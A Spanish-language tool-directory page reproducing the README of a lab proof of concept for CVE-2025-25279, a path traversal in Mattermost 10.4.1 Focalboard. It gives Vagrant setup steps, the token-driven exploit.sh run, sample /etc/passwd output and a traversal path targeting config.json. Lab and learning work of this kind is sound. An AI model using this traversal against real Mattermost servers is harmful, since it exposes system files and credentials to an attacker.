Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — Prueba de concepto del exploit para CVE-2025-25279, un path traversal en Mattermost Focalboard que permite la lectura arbitraria de archivos autenticada y la exfiltración de archivos sensibles. | Kitploit
Herramientas/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

Prueba de concepto del exploit para CVE-2025-25279, un path traversal en Mattermost Focalboard que permite la lectura arbitraria de archivos autenticada y la exfiltración de archivos sensibles.

Ver Repositorio
1hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Path Traversal en Focalboard que permite la exfiltración de archivos

🌟 Presentación

Esta prueba de concepto demuestra la explotación de la vulnerabilidad CVE-2025-25279 que afecta a Mattermost 10.4.1.
Una falla en Focalboard (el módulo de gestión de tableros) permite una lectura arbitraria de archivos mediante un path traversal en los attachments.

El exploit permite exfiltrar:

  • /etc/passwd
  • /etc/group
  • o archivos sensibles de Mattermost, por ejemplo:
    opt/mattermost/config/config.json

El ataque funciona únicamente con una cuenta de usuario autenticado en los escenarios vulnerables.


🗂️ Organización de los directorios

  • 📁 target : directorio de creación de la box objetivo
  • 📁 live : directorio de creación de VM(s) objetivo(s) y de demostración del exploit
  • 📁 src : posible código fuente auxiliar
  • 📁 refs : directorio que contiene los artículos y la bibliografía
  • 📁 docs : documentos asociados producidos durante el proyecto, incluyendo las grabaciones de video

🔧 Requisitos previos

  • Vagrant
  • VirtualBox
  • Conjunto de archivos del proyecto (target + live)
  • Una cuenta de Mattermost (PAT = Personal Access Token)
  • Linux/Mac/Windows con Bash

📦 Descarga de Mattermost

La carpeta target/ no está incluida (demasiado grande para GitHub).

Descargar manualmente: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

Luego colocar el archivo en: target

Antes de desplegar la VM

Primero ve al directorio target y ejecuta:

root@kitploit:~
cd target
make mattermost.box

Asegúrate de tener la box mattermost-poc, de lo contrario la VM no funcionará:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. Despliegue de la máquina vulnerable

Iniciar la VM

root@kitploit:~
cd live/vm1
vagrant up

Conectarse a la VM

root@kitploit:~
 vagrant ssh

crear un usuario en la interfaz web:

abrir: http://localhost:8065

crear un token en la UI (interfaz de usuario):

Perfil --> Security --> Personal Access Tokens

2. Instalación del exploit

Desde la máquina anfitriona:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. Ejecutar el exploit

root@kitploit:~
./exploit.sh

Se te pedirá:

root@kitploit:~
PAT (Personal Access Token) :

👉 Ingresa un PAT válido de un usuario de Mattermost.

📸 Ejemplo de salida (exfiltración de /etc/passwd)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

Archivo objetivo: config.json

Para apuntar a un archivo sensible de Mattermost:

Modificar al inicio del script exploit.sh:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
El exploit mostrará entonces el contenido del archivo config.json.

✒️ Autores

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 Demostración en video

👉 Una demostración completa en video se encuentra en: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 Notas

Este PoC está estrictamente destinado a entornos de aprendizaje. No utilizar nunca fuera del ámbito pedagógico o sin autorización.

Descargar herramienta